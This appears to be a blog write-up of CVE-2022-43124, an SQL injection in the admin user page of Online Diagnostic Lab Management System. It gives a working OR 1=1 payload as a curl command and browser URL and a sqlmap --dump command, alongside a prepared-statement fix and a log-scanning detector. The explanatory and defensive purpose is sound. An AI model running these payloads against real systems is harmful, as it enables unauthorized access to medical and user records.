
Online Diagnostic Lab Management System v1. might sound like a secure way to handle medical records and diagnostics, but in late 2022, it was found vulnerable to a rather basic SQL Injection bug. CVE-2022-43124 allows an attacker to bypass security by targeting the id parameter in a specific admin page. In this article, we'll break down how this vulnerability works, show a sample exploit, and reference the original sources.

What Is SQL Injection Anyway?

SQL Injection (SQLi) is a web security vulnerability that allows attackers to interfere with the queries an application makes to its database. By manipulating the input, adversaries can bypass authentication, view sensitive data, or even modify or delete records, all without valid access.

In Online Diagnostic Lab Management System v1., an administrative web interface lives at:

/admin/?page=user/manage_user&id=<user-input>

The id parameter isn't properly sanitized or checked. This lets attackers input SQL code instead of a harmless user ID.

The Exploit Details

How does it work?

Suppose the backend code looks something like this (example in PHP):

<?php
// Vulnerable code (simplified)
$id = $_GET['id'];
$query = "SELECT * FROM users WHERE id = '$id'";
$result = mysqli_query($conn, $query);
?>

If an attacker sets id=1' OR 1=1 --, the query becomes:

SELECT * FROM users WHERE id = '1' OR 1=1 -- '

The OR 1=1 always evaluates true. The -- marks the rest as a comment, ignoring what's after. This could leak other users' data or give wider access.

A browser or command-line tool like curl is enough to test the vulnerability:

curl "http://targetsite/admin/?page=user/manage_user&id=1'%20OR%201=1--"

Or, visit in your browser:

http://targetsite/admin/?page=user/manage_user&id=1' OR 1=1--

You may see the table displaying more users than just the one with ID = 1… or even all users.

Tools like sqlmap automate this with a command like:

sqlmap -u "http://targetsite/admin/?page=user/manage_user&id=1" --cookie="admin_sessid=..." --risk=3 --level=5 --dump

Example (safe PHP with prepared statements)

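// Bind id as an integer parameter instead of concatenating it into the SQL text
$id = $_GET['id'] ?? '';
$stmt = $conn->prepare('SELECT * FROM users WHERE id = ?');
$stmt->bind_param('i', $id); // 'i' casts the value to an integer
$stmt->execute();
$result = $stmt->get_result();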
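
To check whether this endpoint has already been probed, the following added example (not from the original article or the project) scans web access log lines for manage_user requests whose id is not a plain integer. The log lines are constructed samples in common log format, and the function name and the 10-digit id limit are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
VULN_PAGE = "user/manage_user"          # page value named in the article
STRICT_ID = re.compile(r"[0-9]{1,10}")  # assumed shape of a legitimate user id


def suspicious_manage_user_requests(lines):
    """Return (client_ip, decoded_id) for manage_user hits whose id is not an integer."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # Accept /admin/ at any depth, since the app may sit under a sub-directory.
        if not parts.path.rstrip("/").endswith("/admin"):
            continue
        # parse_qs percent-decodes values, so %27 and %20 are seen as ' and space.
        params = parse_qs(parts.query)
        if VULN_PAGE not in params.get("page", []):
            continue
        for value in params.get("id", []):
            if not STRICT_ID.fullmatch(value):
                hits.append((line.split(" ", 1)[0], value))
    return hits


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Nov/2022:14:20:01 +0000] "GET /admin/?page=user/manage_user&id=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Nov/2022:14:21:37 +0000] "GET /admin/?page=user/manage_user&id=1%27%20OR%201=1-- HTTP/1.1" 200 20480',
    '203.0.113.9 - - [01/Nov/2022:14:21:40 +0000] "GET /admin/?page=user/list HTTP/1.1" 200 4096',
    '198.51.100.7 - - [01/Nov/2022:14:22:10 +0000] "GET /index.php?id=1%27 HTTP/1.1" 404 310',
]

if __name__ == "__main__":
    for ip, value in suspicious_manage_user_requests(SAMPLE_LOG):
        print(f"{ip} sent non-numeric id: {value!r}")
```

The same strict integer check can be applied server-side before the query runs, so malformed ids are rejected as well as logged.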

References

- Exploit Database: CVE-2022-43124
- NVD - CVE-2022-43124 entry
- OWASP - SQL Injection

Final Word

Sometimes, old vulnerabilities still reappear in new software. CVE-2022-43124 is a classic reminder: never trust user input, especially in critical apps like diagnostic lab systems. If you run this application, patch immediately or mitigate exposures.

Timeline

Published on: 11/01/2022 14:15:00 UTC
Last modified on: 11/01/2022 23:33:00 UTC